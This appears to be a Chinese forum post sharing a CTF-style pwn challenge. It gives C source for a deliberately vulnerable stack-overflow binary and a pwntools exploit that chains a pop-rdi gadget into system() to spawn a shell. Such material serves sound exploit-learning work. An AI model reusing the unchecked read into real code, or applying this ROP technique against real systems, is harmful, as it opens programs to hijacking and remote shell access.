题目源码:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char aaa[100]="87asdhf893HF*ry0395$sd)F\x00Y)*SF)";
char ccc[100]="4985y9y()DY)*YFG8yas08d976s08d7$0\x00sadaDS&*(7s";
char bbb[100]="89Y*G(*YfGF0YF8f08yf8\x00)a8s7d0$sd)D9gf-s)";
char ddd[100]="hhhhh, are you finding the binsh?";
char ee[100]="sorry!nothing here!";
char bbddb[100]="23333333333333333333";
int main()
{
char buf[0x10];
memset(&buf,0,0x10);
setvbuf(stdout, 0, 2, 0);
setvbuf(stdin, 0, 1, 0);
printf("Come on,try to pwn me\n");
read(0,buf,0x30);
printf("So~sad,you are fail\n");
return 0;
}
void __libc_shell_()
{
system("ok~you find me,but you can't get my shell'");
}
//????:gcc -z execstack -fno-stack-protector -o stack2 stack2.c
exp:#encoding:utf-8
#!/upr/bin/env python
from pwn import *
p = process("./stack2")
p.recvuntil("Come on,try to pwn me\n")
pop_rdi_ret=0x00000000004007d3
arg=0x60111F
system=0x400570
payload = "a"*0x18+p64(pop_rdi_ret)+p64(arg)+p64(system)
p.send(payload)
p.interactive()
| 
发表于 2020-4-24 00:43:48
|
查看: 2464|
回复: 1
窥视卡
雷达卡
提升卡
置顶卡
关闭卡
开启卡
变色卡
千斤顶
照妖镜
发表于 2020-11-6 23:39:15